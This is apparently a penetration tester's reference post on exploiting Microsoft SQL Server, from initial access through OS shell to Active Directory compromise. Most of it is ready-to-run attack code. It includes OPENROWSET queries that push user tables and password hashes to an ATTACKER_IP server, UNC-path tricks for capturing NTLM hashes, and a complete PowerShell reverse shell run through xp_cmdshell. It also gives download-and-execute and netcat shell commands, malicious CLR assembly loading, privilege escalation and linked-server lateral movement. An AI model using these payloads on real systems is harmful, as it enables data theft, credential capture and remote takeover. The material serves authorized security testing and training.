2026 Edition
MSSQL Exploitation: OPENROWSET, xp_cmdshell, and Database Attack Primitives
A penetration tester's complete reference to MSSQL attack surface — from SQL injection to OS shell, data exfiltration to domain compromise.
Microsoft SQL Server remains one of the most common database platforms in enterprise environments, and it is consistently one of the most rewarding targets in internal penetration tests. MSSQL offers a rich set of built-in functionality that, when misconfigured or when accessed through SQL injection, gives an attacker capabilities ranging from data exfiltration to full operating system command execution to Active Directory domain compromise.
This post covers the core attack primitives every pentester needs to know: OPENROWSET for data exfiltration and file access, xp_cmdshell for OS command execution, hash capture techniques, privilege escalation within SQL Server, and the relationship between MSSQL and Active Directory that makes database compromise a frequent path to domain admin.
Who this is for: Penetration testers, OSCP/OSCP+ candidates, and security engineers who encounter MSSQL during internal engagements. Assumes familiarity with SQL injection fundamentals and basic Windows/AD concepts. All techniques demonstrated here require authorized access — this is pentest documentation, not a hacking tutorial.
Initial Access
Getting Into MSSQL
Before exploiting MSSQL internals, you need access. The most common paths in during a penetration test:
| Access Vector | Details |
|---|
| SQL Injection |
Web application or API vulnerability that passes attacker-controlled input to MSSQL queries. The classic path. Stacked queries (; statement separator) are supported in MSSQL, which massively expands what you can do compared to databases that only allow single statements. |
| Default / Weak Credentials |
SA account with blank or weak password, application service accounts with predictable credentials. Spray with CrackMapExec: crackmapexec mssql target -u sa -p passwords.txt |
| Credential Reuse |
Credentials captured elsewhere (Responder, LSASS dump, config files) that work against MSSQL. Try captured domain creds with Windows authentication. |
| Connection String Leaks |
Hardcoded credentials in web.config, appsettings.json, environment variables, source code repositories, or SharePoint/wiki pages. |
| SPN Discovery |
MSSQL instances register SPNs in Active Directory. Enumerate with GetUserSPNs.py or PowerUpSQL's Get-SQLInstanceDomain — gives you instance locations and potential Kerberoasting targets. |
Discovery and Enumeration
# Discover MSSQL instances on the network
# UDP broadcast on port 1434 (SQL Browser Service)
nmap -sU -p 1434 --script ms-sql-info target_range
# Nmap scripts for MSSQL
nmap -p 1433 --script ms-sql-info,ms-sql-config,ms-sql-empty-password target_ip
# CrackMapExec enumeration
crackmapexec mssql target_range
crackmapexec mssql target_ip -u user -p password --local-auth
# PowerUpSQL — AD-integrated discovery (from domain-joined host)
Import-Module PowerUpSQL
Get-SQLInstanceDomain # Find all SQL instances via SPN enumeration
Get-SQLInstanceBroadcast # UDP broadcast discovery
Get-SQLServerInfo -Instance "target_ip"
# Impacket
mssqlclient.py domain/user:password@target_ip -windows-auth
mssqlclient.py sa:password@target_ip
First Steps After Access
Once connected, enumerate your privileges and the environment before doing anything aggressive:
-- Who are you?
SELECT SYSTEM_USER; -- Login name (SQL or Windows)
SELECT USER_NAME(); -- Database user name
SELECT @@SERVERNAME; -- Server name
SELECT @@VERSION; -- Full version string
SELECT DB_NAME(); -- Current database
-- Are you sysadmin?
SELECT IS_SRVROLEMEMBER('sysadmin'); -- 1 = yes
-- All logins and their roles
SELECT sp.name AS login, sp.type_desc, sp.is_disabled,
sl.sysadmin, sl.securityadmin, sl.serveradmin
FROM sys.server_principals sp
JOIN sys.syslogins sl ON sp.sid = sl.sid
WHERE sp.type IN ('S','U','G');
-- List databases
SELECT name, state_desc FROM sys.databases;
-- List user tables in current database
SELECT TABLE_SCHEMA, TABLE_NAME FROM INFORMATION_SCHEMA.TABLES
WHERE TABLE_TYPE = 'BASE TABLE';
-- Check interesting server configurations
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell'; -- OS command execution
EXEC sp_configure 'Ad Hoc Distributed Queries'; -- OPENROWSET
EXEC sp_configure 'Ole Automation Procedures'; -- sp_OACreate
EXEC sp_configure 'clr enabled'; -- CLR assemblies
-- Check linked servers (lateral movement opportunities)
EXEC sp_linkedservers;
SELECT * FROM sys.servers;
Data Exfiltration
OPENROWSET — Remote Data Access and Exfiltration
OPENROWSET is a T-SQL function that performs a one-time, ad-hoc connection to a remote OLE DB data source — another SQL Server, an Access database, an Excel file, or any OLE DB-compatible source. It appears in SELECT, INSERT, UPDATE, and DELETE statements without requiring a persistent linked server configuration. It also supports a BULK provider for reading local files directly.
From a pentester's perspective, OPENROWSET gives you three capabilities: outbound data exfiltration to an attacker-controlled database, local file reading on the database server, and NTLM hash capture via UNC path authentication.
Prerequisites
- The
Ad Hoc Distributed Queries server option must be enabled (disabled by default since SQL Server 2005 — but always check, because DBAs re-enable it for legitimate reasons)
- The executing user needs appropriate permissions — sysadmin can do everything; non-sysadmin users need explicit
ADMINISTER BULK OPERATIONS for BULK operations
- For outbound exfiltration: TCP connectivity from the database server to your listener (default port 1433, but you can specify any port)
-- Check if Ad Hoc Distributed Queries is enabled
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'Ad Hoc Distributed Queries';
-- config_value = 1 means enabled
-- Enable it (requires sysadmin)
EXEC sp_configure 'Ad Hoc Distributed Queries', 1;
RECONFIGURE;
OPENROWSET Syntax
OPENROWSET(
'provider_name',
'provider_string', -- connection info: server, credentials
{ [catalog.][schema.]object | 'query' }
)
-- Or with BULK provider (local file read):
OPENROWSET(
BULK 'file_path',
SINGLE_CLOB | SINGLE_BLOB | SINGLE_NCLOB
| FORMATFILE = 'format_file_path'
) AS alias
The key arguments:
| Argument | What It Does |
|---|
provider_name | OLE DB provider. For MSSQL-to-MSSQL: 'SQLOLEDB' (legacy) or 'MSOLEDBSQL' (modern). For ODBC: 'MSDASQL'. |
datasource | Server address. Use Network=DBMSSOCN; prefix for TCP/IP. Append ,port after IP for non-standard ports. |
user_id / password | Credentials for the remote data source — these are credentials on your attacker-controlled server, not the target. |
provider_string | Alternative: entire connection string in one parameter. |
'query' | Pass-through query executed on the remote server. Results returned to the local context. |
BULK 'file_path' | Read a local file. SINGLE_CLOB = text, SINGLE_BLOB = binary, SINGLE_NCLOB = Unicode text. |
Technique 1: Outbound Data Exfiltration
The core attack: use OPENROWSET to push query results from the target database to a SQL Server you control. The target database initiates the outbound TCP connection — if egress filtering blocks port 1433, specify a different port.
Attacker Setup
# Run MSSQL on your attack machine via Docker
docker run -e "ACCEPT_EULA=Y" -e "MSSQL_SA_PASSWORD=Attacker!Pass123" \
-p 1433:1433 --name mssql-loot \
-d mcr.microsoft.com/mssql/server:2022-latest
# On a non-standard port (firewall evasion)
docker run -e "ACCEPT_EULA=Y" -e "MSSQL_SA_PASSWORD=Attacker!Pass123" \
-p 8443:1433 --name mssql-loot \
-d mcr.microsoft.com/mssql/server:2022-latest
# Create the loot database and receiving table
# Columns must match the data you are exfiltrating
sqlcmd -S localhost -U sa -P 'Attacker!Pass123' -Q "
CREATE DATABASE loot;
GO
USE loot;
CREATE TABLE exfil_users (username NVARCHAR(256), email NVARCHAR(256), pw_hash NVARCHAR(256));
CREATE TABLE exfil_tables (table_name NVARCHAR(256));
CREATE TABLE exfil_generic (col1 NVARCHAR(MAX));
GO
"
Exfiltration Queries (executed on target)
-- Test outbound connectivity: SELECT from your attacker server
SELECT * FROM OPENROWSET(
'SQLOLEDB',
'Network=DBMSSOCN;Address=ATTACKER_IP;uid=sa;pwd=Attacker!Pass123',
'SELECT 1 AS connectivity_test'
);
-- If this returns "1", you have outbound TCP to your server
-- Non-standard port (e.g., 8443)
SELECT * FROM OPENROWSET(
'SQLOLEDB',
'Network=DBMSSOCN;Address=ATTACKER_IP,8443;uid=sa;pwd=Attacker!Pass123',
'SELECT 1 AS connectivity_test'
);
-- Exfiltrate user table names
INSERT INTO OPENROWSET(
'SQLOLEDB',
'Network=DBMSSOCN;Address=ATTACKER_IP;uid=sa;pwd=Attacker!Pass123',
'SELECT * FROM loot.dbo.exfil_tables'
)
SELECT name FROM sysobjects WHERE xtype = 'U';
-- Exfiltrate actual application data
INSERT INTO OPENROWSET(
'SQLOLEDB',
'Network=DBMSSOCN;Address=ATTACKER_IP;uid=sa;pwd=Attacker!Pass123',
'SELECT * FROM loot.dbo.exfil_users'
)
SELECT TOP 500 username, email, password_hash FROM dbo.Users;
-- Exfiltrate server configuration
INSERT INTO OPENROWSET(
'SQLOLEDB',
'Network=DBMSSOCN;Address=ATTACKER_IP;uid=sa;pwd=Attacker!Pass123',
'SELECT * FROM loot.dbo.exfil_generic'
)
SELECT name + '=' + CAST(value_in_use AS NVARCHAR(50))
FROM sys.configurations
WHERE name IN ('xp_cmdshell','clr enabled','Ad Hoc Distributed Queries','Ole Automation Procedures');
Column matching is critical: The INSERT INTO OPENROWSET ... SELECT pattern requires that the columns returned by your local SELECT match the columns of the remote table in number and compatible data types. If they do not match, the query fails silently or throws a type mismatch error. Use NVARCHAR(MAX) on your loot table for maximum flexibility, and cast columns as needed.
Technique 2: Local File Read (BULK Provider)
The BULK provider reads files on the database server's filesystem — anything the SQL Server service account can access. This is how you extract configuration files, connection strings, and potentially credential material without needing OS command execution.
-- Read web.config (connection strings, API keys, encryption keys)
SELECT BulkColumn
FROM OPENROWSET(BULK 'C:\inetpub\wwwroot\web.config', SINGLE_CLOB) AS x;
-- Read appsettings.json (.NET Core / .NET 5+ applications)
SELECT BulkColumn
FROM OPENROWSET(BULK 'C:\inetpub\wwwroot\appsettings.json', SINGLE_CLOB) AS x;
-- Read machine.config (machine-wide .NET config)
SELECT BulkColumn
FROM OPENROWSET(
BULK 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\machine.config',
SINGLE_CLOB
) AS x;
-- Read hosts file (internal hostname mapping)
SELECT BulkColumn
FROM OPENROWSET(BULK 'C:\Windows\System32\drivers\etc\hosts', SINGLE_CLOB) AS x;
-- Read SQL Server error log (may contain query fragments, paths, usernames)
SELECT BulkColumn
FROM OPENROWSET(
BULK 'C:\Program Files\Microsoft SQL Server\MSSQL16.MSSQLSERVER\MSSQL\Log\ERRORLOG',
SINGLE_CLOB
) AS x;
-- Read binary files (e.g., backup copies of SAM/SYSTEM)
SELECT BulkColumn
FROM OPENROWSET(BULK 'C:\temp\SAM', SINGLE_BLOB) AS x;
-- Attempt registry hive copies (usually locked, but try backup locations)
-- C:\Windows\repair\SAM, Volume Shadow Copies, etc.
Technique 3: NTLM Hash Capture via UNC Path
This is one of the most reliable and impactful techniques. When MSSQL accesses a UNC path (\\server\share), the SQL Server service account authenticates to the remote SMB server — sending its NTLMv2 hash. You do not need OPENROWSET enabled for this; several built-in procedures trigger UNC authentication.
-- Method 1: OPENROWSET BULK with UNC path
SELECT BulkColumn
FROM OPENROWSET(BULK '\\ATTACKER_IP\share\doesnotexist.txt', SINGLE_CLOB) AS x;
-- File doesn't need to exist — authentication happens before file access
-- Method 2: xp_dirtree (works for ANY authenticated user, not just sysadmin)
EXEC xp_dirtree '\\ATTACKER_IP\share';
-- Method 3: xp_fileexist
EXEC xp_fileexist '\\ATTACKER_IP\share\file.txt';
-- Method 4: xp_subdirs
EXEC xp_subdirs '\\ATTACKER_IP\share';
-- Method 5: BACKUP DATABASE to UNC (requires appropriate permissions)
BACKUP DATABASE master TO DISK = '\\ATTACKER_IP\share\backup.bak';
Attacker-Side Capture
# Option 1: Responder (captures NTLMv2 hash)
sudo responder -I eth0 -v
# Option 2: Impacket smbserver (captures hash + can serve files)
sudo impacket-smbserver share /tmp/share -smb2support
# Option 3: Relay instead of capture (if SMB signing is not required)
sudo ntlmrelayx.py -t target_host -smb2support
# After capture, crack NTLMv2 with Hashcat
hashcat -m 5600 captured_hash.txt rockyou.txt -r rules/best64.rule
Why this matters: SQL Server service accounts are frequently domain accounts with elevated privileges — sometimes local admin on multiple servers, sometimes members of high-privilege AD groups. Capturing and cracking (or relaying) the service account hash can give you lateral movement across the entire environment. The xp_dirtree method is especially valuable because it does not require sysadmin or any special configuration — any authenticated database user can trigger it.
OS Access
xp_cmdshell — Operating System Command Execution
xp_cmdshell is the most direct path from SQL Server access to operating system compromise. It spawns a Windows command shell process, executes the specified command, and returns output as rows of text. This has been disabled by default since SQL Server 2005, but if you have sysadmin privileges, you can re-enable it with two configuration commands.
Enable and Execute
-- Check current state
EXEC sp_configure 'xp_cmdshell';
-- run_value = 0 means disabled
-- Enable (requires sysadmin)
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
-- Execute OS commands
EXEC xp_cmdshell 'whoami';
EXEC xp_cmdshell 'whoami /priv';
EXEC xp_cmdshell 'hostname';
EXEC xp_cmdshell 'ipconfig /all';
EXEC xp_cmdshell 'net user';
EXEC xp_cmdshell 'net localgroup administrators';
EXEC xp_cmdshell 'net group "Domain Admins" /domain';
EXEC xp_cmdshell 'systeminfo';
EXEC xp_cmdshell 'tasklist /v';
EXEC xp_cmdshell 'netstat -ano';
EXEC xp_cmdshell 'dir C:\inetpub\wwwroot\';
EXEC xp_cmdshell 'type C:\inetpub\wwwroot\web.config';
Getting a Reverse Shell
-- PowerShell reverse shell (most common)
EXEC xp_cmdshell 'powershell -ep bypass -nop -c "$c=New-Object Net.Sockets.TCPClient(''ATTACKER_IP'',4444);$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length)) -ne 0){$d=(New-Object Text.ASCIIEncoding).GetString($b,0,$i);$r=(iex $d 2>&1|Out-String);$s.Write(([text.encoding]::ASCII.GetBytes($r)),0,$r.Length)}"';
-- Download and execute (two-stage — more reliable)
EXEC xp_cmdshell 'powershell -ep bypass -c "IEX(New-Object Net.WebClient).DownloadString(''http://ATTACKER_IP/shell.ps1'')"';
-- Certutil file transfer (often less monitored than PowerShell downloads)
EXEC xp_cmdshell 'certutil -urlcache -split -f http://ATTACKER_IP/nc64.exe C:\Windows\Temp\nc64.exe';
EXEC xp_cmdshell 'C:\Windows\Temp\nc64.exe ATTACKER_IP 4444 -e cmd.exe';
-- Bitsadmin file transfer (alternative)
EXEC xp_cmdshell 'bitsadmin /transfer job /download /priority high http://ATTACKER_IP/payload.exe C:\Windows\Temp\payload.exe';
-- Meterpreter via Metasploit (automated)
-- In msfconsole:
-- use exploit/windows/mssql/mssql_payload
-- set RHOSTS target_ip
-- set USERNAME sa
-- set PASSWORD password
-- run
Detection warning: Enabling xp_cmdshell generates SQL Server Audit events (specifically, sp_configure changes are logged). Most EDR solutions hook cmd.exe and powershell.exe child processes spawned by sqlservr.exe — this is a high-fidelity detection. In mature environments, expect this to trigger alerts within seconds. Consider stealthier alternatives (below) for environments with active monitoring.
Disable After Use
-- Clean up: disable xp_cmdshell when done
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;
Alternatives
Beyond xp_cmdshell: Stealthier Execution Methods
When xp_cmdshell is too noisy or too monitored, MSSQL provides several alternative code execution paths. Each has different prerequisites, detection profiles, and capabilities.
sp_OACreate — OLE Automation
Instantiate COM objects within SQL Server. The classic technique uses wscript.shell to execute OS commands without touching xp_cmdshell.
-- Enable OLE Automation (requires sysadmin)
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'Ole Automation Procedures', 1; RECONFIGURE;
-- Execute a command via wscript.shell
DECLARE @shell INT;
EXEC sp_OACreate 'wscript.shell', @shell OUTPUT;
EXEC sp_OAMethod @shell, 'run', NULL, 'cmd /c whoami > C:\Windows\Temp\output.txt';
-- Read the output
EXEC xp_cmdshell 'type C:\Windows\Temp\output.txt';
-- Or use OPENROWSET BULK to read it without xp_cmdshell:
SELECT BulkColumn FROM OPENROWSET(
BULK 'C:\Windows\Temp\output.txt', SINGLE_CLOB
) AS x;
CLR Assembly — Custom .NET Code Execution
Load a custom .NET assembly into SQL Server for arbitrary code execution. This is the most powerful technique — you can run anything .NET can do, including fully functional reverse shells, in-memory tooling, and C# implants.
-- Enable CLR (requires sysadmin)
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'clr enabled', 1; RECONFIGURE;
-- For SQL Server 2017+, you also need:
EXEC sp_configure 'clr strict security', 0; RECONFIGURE;
-- Or sign the assembly with a certificate
-- Create assembly from hex-encoded DLL bytes
-- (Generate with: msfvenom -p windows/x64/meterpreter/reverse_tcp
-- LHOST=ATTACKER_IP LPORT=4444 -f csharp, compile, convert to hex)
CREATE ASSEMBLY [malicious_assembly]
FROM 0x4D5A900003... -- hex bytes of your .NET DLL
WITH PERMISSION_SET = UNSAFE;
-- Create stored procedure mapped to CLR method
CREATE PROCEDURE [dbo].[cmd_exec] @cmd NVARCHAR(4000)
AS EXTERNAL NAME [malicious_assembly].[StoredProcedures].[cmd_exec];
-- Execute
EXEC cmd_exec 'whoami';
SQL Server Agent Jobs
Create a scheduled SQL Agent job that executes an OS command. Stealthier than xp_cmdshell because the command runs under the SQL Agent service account context, and the execution is decoupled from your session.
-- Requires sysadmin or SQLAgentOperatorRole
USE msdb;
EXEC dbo.sp_add_job @job_name = N'pentest_job';
EXEC dbo.sp_add_jobstep @job_name = N'pentest_job',
@step_name = N'exec_cmd',
@subsystem = N'CmdExec',
@command = N'whoami > C:\Windows\Temp\agent_output.txt',
@retry_attempts = 0,
@retry_interval = 0;
EXEC dbo.sp_add_jobserver @job_name = N'pentest_job';
-- Execute immediately
EXEC dbo.sp_start_job @job_name = N'pentest_job';
-- Wait a moment, then read output
WAITFOR DELAY '00:00:05';
SELECT BulkColumn FROM OPENROWSET(
BULK 'C:\Windows\Temp\agent_output.txt', SINGLE_CLOB
) AS x;
-- Clean up
EXEC dbo.sp_delete_job @job_name = N'pentest_job';
Linked Server Hopping — Lateral Movement
Linked servers create persistent connections between SQL Server instances. If the target has linked servers configured (common in enterprise environments), you can execute queries — and potentially OS commands — on remote instances through the link chain.
-- Enumerate linked servers
EXEC sp_linkedservers;
SELECT * FROM sys.servers WHERE is_linked = 1;
-- Execute query on linked server
SELECT * FROM OPENQUERY([LINKED_SERVER_NAME], 'SELECT @@SERVERNAME');
SELECT * FROM OPENQUERY([LINKED_SERVER_NAME], 'SELECT SYSTEM_USER');
SELECT * FROM OPENQUERY([LINKED_SERVER_NAME], 'SELECT IS_SRVROLEMEMBER(''sysadmin'')');
-- Enable xp_cmdshell on linked server (if sysadmin there)
EXEC ('sp_configure ''show advanced options'', 1; RECONFIGURE;') AT [LINKED_SERVER_NAME];
EXEC ('sp_configure ''xp_cmdshell'', 1; RECONFIGURE;') AT [LINKED_SERVER_NAME];
EXEC ('xp_cmdshell ''whoami'';') AT [LINKED_SERVER_NAME];
-- Double-hop: linked server A → linked server B
SELECT * FROM OPENQUERY([SERVER_A],
'SELECT * FROM OPENQUERY([SERVER_B], ''SELECT @@SERVERNAME'')'
);
Linked server abuse is lateral movement. In large enterprises, you can chain through 3-4 linked servers and end up on a database server in a different network segment, datacenter, or even a different domain trust — all authenticated transparently. Map linked server topology early and treat each hop as a new compromise opportunity.
Comparison: Execution Methods
| Method | Requirement | Detection Profile | Output Capture |
|---|
xp_cmdshell |
sysadmin |
High — well-monitored, sp_configure change logged |
Direct (returns rows) |
sp_OACreate |
sysadmin |
Medium — less commonly monitored than xp_cmdshell |
Indirect (write to file, read back) |
| CLR Assembly |
sysadmin |
Medium-Low — assembly registration logged but execution blends in |
Direct (custom implementation) |
| SQL Agent Job |
sysadmin or Agent role |
Low — Agent jobs are normal; decoupled execution |
Indirect (write to file) |
| Linked Servers |
Varies per link config |
Low-Medium — cross-server queries are normal traffic |
Direct (via OPENQUERY) |
xp_dirtree (hash capture) |
Any authenticated user |
Low — no configuration change needed |
N/A (captures auth, not output) |
Privilege Escalation
Escalating Within SQL Server
If you land on MSSQL as a low-privilege user and need sysadmin, there are several escalation paths:
Impersonation (EXECUTE AS)
-- Check who you can impersonate
SELECT DISTINCT grantee_principal_id, permission_name,
dp.name AS grantee_name, dp2.name AS grantor_name
FROM sys.server_permissions sp
JOIN sys.server_principals dp ON sp.grantee_principal_id = dp.principal_id
JOIN sys.server_principals dp2 ON sp.grantor_principal_id = dp2.principal_id
WHERE permission_name = 'IMPERSONATE';
-- Impersonate a login
EXECUTE AS LOGIN = 'sa';
SELECT SYSTEM_USER; -- Should now return 'sa'
SELECT IS_SRVROLEMEMBER('sysadmin'); -- Should return 1
-- Execute as sysadmin, then do anything
EXEC xp_cmdshell 'whoami';
-- Revert
REVERT;
Trustworthy Database Escalation
-- Check for TRUSTWORTHY databases
SELECT name, is_trustworthy_on FROM sys.databases WHERE is_trustworthy_on = 1;
-- If you are db_owner of a TRUSTWORTHY database:
-- You can create a stored procedure that executes as the database owner
-- If the database owner is sysadmin, you get sysadmin execution context
USE [trustworthy_db];
CREATE PROCEDURE sp_escalate
WITH EXECUTE AS OWNER
AS
EXEC sp_addsrvrolemember 'your_login', 'sysadmin';
GO
EXEC sp_escalate;
Service Account Abuse
-- If SQL Server service runs as a domain account:
-- 1. Capture its hash via xp_dirtree/UNC
-- 2. Check if it has local admin on other machines
-- 3. Use it for Kerberoasting (if it has SPNs)
-- 4. Check AD group memberships
-- Via xp_dirtree hash capture:
EXEC xp_dirtree '\\ATTACKER_IP\capture';
-- Capture hash → crack/relay → lateral movement
AD Integration
MSSQL and Active Directory
MSSQL is deeply integrated with Active Directory in most enterprise environments. This integration creates attack paths that flow bidirectionally — from AD to MSSQL and from MSSQL to AD.
Discovery via AD
# All SQL Server SPNs in the domain (reveals every instance)
GetUserSPNs.py domain/user:password -dc-ip DC_IP | grep -i mssql
# PowerUpSQL comprehensive discovery
Get-SQLInstanceDomain | Get-SQLServerInfo
# Kerberoast SQL Server service accounts
GetUserSPNs.py domain/user:password -dc-ip DC_IP -request \
-outputfile sql_tgs_hashes.txt
# Crack with hashcat -m 13100
From MSSQL to Domain Compromise
Compromise MSSQL (SQLi, weak creds, credential reuse)
│
├──► xp_dirtree → capture service account NTLMv2 hash
│ ├──► Crack hash → credential reuse across environment
│ └──► Relay hash → authenticate to other services (ntlmrelayx)
│
├──► xp_cmdshell → dump LSASS (mimikatz, procdump)
│ └──► Extract cached domain credentials → lateral movement
│
├──► Linked servers → hop to other SQL instances
│ └──► Different service accounts, different network segments
│
└──► coerce authentication → PetitPotam, PrinterBug via xp_cmdshell
└──► Relay to ADCS → domain admin certificate
Common finding: SQL Server service accounts running as domain admin, or with unconstrained delegation enabled, or with write access to Group Policy Objects. Any of these turns MSSQL compromise into immediate domain compromise. Always check the service account's AD group memberships and permissions with BloodHound after capturing or cracking the credentials.
Beyond MSSQL
Other Database Targets — Quick Reference
MSSQL is not the only database you will encounter in the field. Each platform has its own exploitation primitives:
| Database | Key Attack Vectors | Tools |
|---|
| PostgreSQL |
COPY TO/FROM PROGRAM (direct OS command execution if superuser), pg_read_file() and pg_read_binary_file() for local file read, large object abuse (lo_import/lo_export) for file write, extension loading for arbitrary code execution |
psql, SQLMap, Metasploit |
| MySQL / MariaDB |
LOAD DATA LOCAL INFILE (read client-side files via rogue MySQL server), SELECT ... INTO OUTFILE (write files — e.g., webshell to webroot), User Defined Functions (UDF) compiled shared library loading for OS command execution |
mysql client, SQLMap, Metasploit, Rogue MySQL Server |
| Oracle |
Java stored procedures for OS access, DBMS_SCHEDULER for command execution, UTL_HTTP / UTL_TCP for outbound connections, TNS listener attacks, default credentials (SYS/CHANGE_ON_INSTALL, DBSNMP/DBSNMP) |
odat (Oracle Database Attacking Tool), SQLMap, Metasploit, tnscmd10g |
| MongoDB |
NoSQL injection ($gt, $ne, $regex operators), unauthenticated access (common on legacy versions), $where JavaScript injection for server-side code execution, SSRF via $lookup |
mongosh, NoSQLMap, Nuclei templates |
| Redis |
Unauthenticated access (default configuration), CONFIG SET dir/dbfilename to write SSH authorized_keys or crontabs, module loading (MODULE LOAD) for native code execution, Lua scripting via EVAL |
redis-cli, redis-rogue-server, Metasploit |
Reference
MSSQL Exploitation Toolkit
| Tool | Purpose |
|---|
Impacket mssqlclient.py | Interactive MSSQL client — supports Windows and SQL auth, hash authentication, xp_cmdshell enable/exec, file upload/download. The go-to for manual MSSQL interaction from Linux. |
CrackMapExec / NetExec | MSSQL credential spraying, command execution, enumeration: crackmapexec mssql target -u user -p pass -x 'whoami' |
PowerUpSQL | PowerShell toolkit for MSSQL discovery, enumeration, and exploitation in AD environments. Finds instances via SPN enumeration, audits misconfigs, tests linked servers, deploys CLR assemblies. |
SQLMap | Automated SQL injection — --os-shell (interactive OS shell), --os-pwn (Meterpreter), --file-read, --file-write. Handles MSSQL stacked queries natively. |
Metasploit | auxiliary/scanner/mssql/mssql_login (credential testing), exploit/windows/mssql/mssql_payload (shell delivery), auxiliary/admin/mssql/mssql_exec (command execution), auxiliary/admin/mssql/mssql_escalate_dbowner |
HeidiSQL / Azure Data Studio | GUI clients for interactive database exploration and manual query execution when you have credentials. |
Responder | Captures NTLMv2 hashes when MSSQL authenticates to your UNC path. Essential companion to xp_dirtree / OPENROWSET UNC techniques. |
ntlmrelayx (Impacket) | Relay captured MSSQL service account authentication to other services instead of cracking — direct lateral movement. |
Originally published circa 2012 as an OPENROWSET reference. Fully rewritten and expanded — March 2026.
For the complete penetration testing framework this belongs to, see the companion post: The Essential Penetration Testing Framework — 2026 Edition.
